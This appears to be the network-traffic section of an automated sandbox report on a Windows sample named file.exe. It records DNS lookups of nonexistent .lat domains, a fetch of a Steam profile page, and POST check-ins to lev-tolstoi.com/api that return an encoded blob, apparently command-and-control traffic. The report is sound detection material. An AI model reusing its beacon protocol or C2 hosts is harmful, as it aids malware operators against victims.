                                                                                                                                                                                                                                            Jan 2, 2025 20:16:48.196846962 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:48.197321892 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:48.210639000 CET49714443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:48.210689068 CET49714443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:48.210892916 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:49.034931898 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:49.034998894 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:49.035862923 CET49714443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:49.038441896 CET49714443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:49.038455963 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:49.038491011 CET49714443192.168.2.7172.67.157.254
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:49.038495064 CET44349714172.67.157.254192.168.2.7
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.519516945 CET5453853192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.528260946 CET53545381.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.532233953 CET6016753192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.541471004 CET53601671.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.543813944 CET6116453192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.552706003 CET53611641.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.555115938 CET5393753192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.563951969 CET53539371.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.565149069 CET5337753192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.574388027 CET53533771.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.577393055 CET5766453192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.586203098 CET53576641.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.589525938 CET6495653192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.598380089 CET53649561.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.600816011 CET6169253192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.609889984 CET53616921.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.612478018 CET5203953192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.621432066 CET53520391.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.624058008 CET5221653192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.632937908 CET53522161.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.476665974 CET5931353192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.483282089 CET53593131.1.1.1192.168.2.7
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.597668886 CET5436553192.168.2.71.1.1.1
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.759393930 CET53543651.1.1.1192.168.2.7
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.519516945 CET192.168.2.71.1.1.10xf4a3Standard query (0)enterwahsh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.532233953 CET192.168.2.71.1.1.10x1408Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.543813944 CET192.168.2.71.1.1.10x7abStandard query (0)slipperyloo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.555115938 CET192.168.2.71.1.1.10xb3b4Standard query (0)manyrestro.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.565149069 CET192.168.2.71.1.1.10x8e3cStandard query (0)shapestickyr.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.577393055 CET192.168.2.71.1.1.10x66eaStandard query (0)talkynicer.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.589525938 CET192.168.2.71.1.1.10xbe07Standard query (0)curverpluch.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.600816011 CET192.168.2.71.1.1.10xf3e1Standard query (0)tentabatte.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.612478018 CET192.168.2.71.1.1.10xc042Standard query (0)bashfulacid.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.624058008 CET192.168.2.71.1.1.10x63f6Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.476665974 CET192.168.2.71.1.1.10xdacaStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.597668886 CET192.168.2.71.1.1.10x6bb0Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.528260946 CET1.1.1.1192.168.2.70xf4a3Name error (3)enterwahsh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.541471004 CET1.1.1.1192.168.2.70x1408Name error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.552706003 CET1.1.1.1192.168.2.70x7abName error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.563951969 CET1.1.1.1192.168.2.70xb3b4Name error (3)manyrestro.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.574388027 CET1.1.1.1192.168.2.70x8e3cName error (3)shapestickyr.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.586203098 CET1.1.1.1192.168.2.70x66eaName error (3)talkynicer.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.598380089 CET1.1.1.1192.168.2.70xbe07Name error (3)curverpluch.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.609889984 CET1.1.1.1192.168.2.70xf3e1Name error (3)tentabatte.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.621432066 CET1.1.1.1192.168.2.70xc042Name error (3)bashfulacid.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:36.632937908 CET1.1.1.1192.168.2.70x63f6No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.483282089 CET1.1.1.1192.168.2.70xdacaNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:38.483282089 CET1.1.1.1192.168.2.70xdacaNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.759393930 CET1.1.1.1192.168.2.70x6bb0No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 2, 2025 20:16:43.759393930 CET1.1.1.1192.168.2.70x6bb0No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                                                            • lev-tolstoi.com
                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.749700104.102.49.2544434048C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-02 19:16:37 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                                                            2025-01-02 19:16:38 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Date: Thu, 02 Jan 2025 19:16:38 GMT
                                                                                                                                                                                                                                            Content-Length: 35121
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: sessionid=7c542e9a362009d06e76ed69; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            2025-01-02 19:16:38 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                            2025-01-02 19:16:38 UTC16384INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                            Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                            2025-01-02 19:16:38 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22
                                                                                                                                                                                                                                            Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
                                                                                                                                                                                                                                            2025-01-02 19:16:38 UTC490INData Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74
                                                                                                                                                                                                                                            Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.749701172.67.157.2544434048C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-02 19:16:38 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2025-01-02 19:16:38 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2025-01-02 19:16:39 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 02 Jan 2025 19:16:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=vjo2io526m80tksledhfbddtab; expires=Mon, 28 Apr 2025 13:03:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2FfEPn3uqn6HnwgQqEitG%2BLhv9ETZVS3z0S9%2B%2BH7faJkLrKfRky3n0DtxnEhZ3B%2FM5iAWF6K3jYTRLw%2F8qKaQpO0A%2FGM467ZcvQ2iBpHlMpq3Izkc3oRBcAEumrEOYvRXsc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8fbd15affc101885-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1864623&cwnd=193&unsent_bytes=0&cid=c989bf882e0b97de&ts=442&x=0"
                                                                                                                                                                                                                                            2025-01-02 19:16:39 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                            2025-01-02 19:16:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.749702172.67.157.2544434048C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 86
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 02 Jan 2025 19:16:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=pjr58d8gs271t9oua2t2a0idf8; expires=Mon, 28 Apr 2025 13:03:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BCMKXA4QOyyG7f%2FpOqKhNdbhSmmQoj4jZlLaKDeSZIi8Q4scEtUnbYAZKRlHY%2B9ULJlXxgEXU%2BzCmvamIoOCVKN7MVk7DsKjYvj36gI7S1J%2BtzeZdxfXTRsrGWZ%2B2cPH84%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8fbd15b6adc3c337-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1686&rtt_var=644&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=985&delivery_rate=1682997&cwnd=203&unsent_bytes=0&cid=c814efc7a39d665d&ts=470&x=0"
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC240INData Raw: 34 33 30 63 0d 0a 50 51 36 35 73 31 55 47 79 48 76 66 49 71 63 45 43 42 72 4c 55 33 41 46 42 56 6d 46 4e 48 7a 43 45 4a 76 2b 39 52 34 30 78 4d 78 47 4c 4d 2b 52 62 7a 4c 6b 57 61 78 48 68 54 35 75 65 36 63 67 46 53 6b 6e 4f 4f 45 57 52 71 52 78 39 34 32 51 4d 68 61 79 6f 52 38 30 33 39 49 35 64 61 31 58 2f 55 66 66 4a 6a 4a 42 73 48 45 56 61 79 64 6a 70 31 45 57 6f 48 48 33 6e 4a 52 31 57 37 53 67 58 6d 62 56 31 44 31 6a 71 78 2b 2b 54 73 70 68 62 58 2b 71 4f 52 35 73 61 44 48 6f 46 6c 44 67 64 65 48 63 7a 7a 78 35 6f 62 68 63 51 39 6a 41 50 69 53 31 56 36 51 41 77 6d 6f 71 49 4f 6b 79 46 57 64 70 50 2b 46 66 46 4b 70 34 2f 35 32 52 64 45 53 74 71 6c 56 6d 32 39 63 38 61 61 49 4c 73 30 54 4e 61 6d 74 31 71 6e
                                                                                                                                                                                                                                            Data Ascii: 430cPQ65s1UGyHvfIqcECBrLU3AFBVmFNHzCEJv+9R40xMxGLM+RbzLkWaxHhT5ue6cgFSknOOEWRqRx942QMhayoR8039I5da1X/UffJjJBsHEVaydjp1EWoHH3nJR1W7SgXmbV1D1jqx++TsphbX+qOR5saDHoFlDgdeHczzx5obhcQ9jAPiS1V6QAwmoqIOkyFWdpP+FfFKp4/52RdEStqlVm29c8aaILs0TNamt1qn
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC1369INData Raw: 46 63 4a 32 41 6a 70 77 35 65 38 30 44 36 6a 59 5a 70 57 37 61 6f 48 33 4f 56 79 48 64 6a 70 6c 6e 6c 41 4d 31 71 5a 48 32 71 50 68 56 6d 5a 79 6e 6f 56 68 32 6f 65 76 32 57 6d 48 4e 5a 71 4b 52 59 5a 4e 4c 57 4f 47 4f 69 48 37 4a 44 68 53 67 71 66 37 46 78 53 69 64 48 4b 2b 52 56 43 71 31 6a 75 59 50 5a 5a 52 61 68 6f 68 38 30 6d 39 63 35 5a 61 63 5a 72 30 6a 4f 62 57 39 71 6f 6a 67 66 61 6d 63 32 37 56 6b 64 6f 48 58 7a 6c 70 68 32 55 71 75 6a 57 57 7a 62 6b 58 6b 6b 72 51 48 39 47 49 56 46 62 32 69 75 50 51 51 6c 58 58 76 34 47 41 66 67 64 66 58 63 7a 7a 78 65 6f 36 31 63 5a 39 54 53 50 32 2b 34 47 61 39 47 79 47 4e 34 66 71 77 2f 47 47 52 31 4d 65 6c 51 48 61 6c 35 38 4a 6d 51 65 42 62 6f 37 6c 68 30 6d 34 6c 33 52 61 63 53 73 55 72 53 5a 69 70 6e 35
                                                                                                                                                                                                                                            Data Ascii: FcJ2Ajpw5e80D6jYZpW7aoH3OVyHdjplnlAM1qZH2qPhVmZynoVh2oev2WmHNZqKRYZNLWOGOiH7JDhSgqf7FxSidHK+RVCq1juYPZZRahoh80m9c5ZacZr0jObW9qojgfamc27VkdoHXzlph2UqujWWzbkXkkrQH9GIVFb2iuPQQlXXv4GAfgdfXczzxeo61cZ9TSP2+4Ga9GyGN4fqw/GGR1MelQHal58JmQeBbo7lh0m4l3RacSsUrSZipn5
                                                                                                                                                                                                                                            2025-01-02 19:16:40 UTC1369INData Raw: 74 4f 2b 39 54 48 36 70 34 75 64 4c 58 65 30 37 6d 39 68 39 64 7a 4e 70 31 55 61 6b 58 73 30 66 54 4a 6e 55 32 73 48 45 56 61 79 64 6a 70 31 73 57 70 58 66 32 6e 5a 31 79 55 36 79 69 56 32 4c 59 77 7a 68 67 71 68 57 31 53 73 68 6f 62 6e 43 67 4f 68 6c 68 5a 7a 72 74 46 6c 44 67 64 65 48 63 7a 7a 78 69 6f 61 4a 53 59 35 6e 6b 4e 47 71 6b 48 71 73 41 32 69 68 7a 4f 4b 34 39 55 6a 38 6e 4e 2b 35 57 46 61 70 32 2b 5a 75 61 65 56 57 68 72 56 4a 72 30 64 38 77 59 4b 59 51 73 45 62 46 59 57 35 39 75 7a 51 62 61 32 74 37 71 52 59 5a 75 44 4b 68 33 4c 68 37 51 4b 57 42 58 48 33 53 6b 53 67 71 73 31 6d 36 54 49 55 2b 4b 6e 2b 73 4f 52 6c 68 62 7a 76 31 55 78 43 72 63 2f 4f 61 6c 6e 46 61 6f 4b 35 65 62 4e 33 64 4e 32 4f 74 43 36 39 46 77 33 52 67 4f 4f 64 78 46 58
                                                                                                                                                                                                                                            Data Ascii: tO+9TH6p4udLXe07m9h9dzNp1UakXs0fTJnU2sHEVaydjp1sWpXf2nZ1yU6yiV2LYwzhgqhW1SshobnCgOhlhZzrtFlDgdeHczzxioaJSY5nkNGqkHqsA2ihzOK49Uj8nN+5WFap2+ZuaeVWhrVJr0d8wYKYQsEbFYW59uzQba2t7qRYZuDKh3Lh7QKWBXH3SkSgqs1m6TIU+Kn+sORlhbzv1UxCrc/OalnFaoK5ebN3dN2OtC69Fw3RgOOdxFX
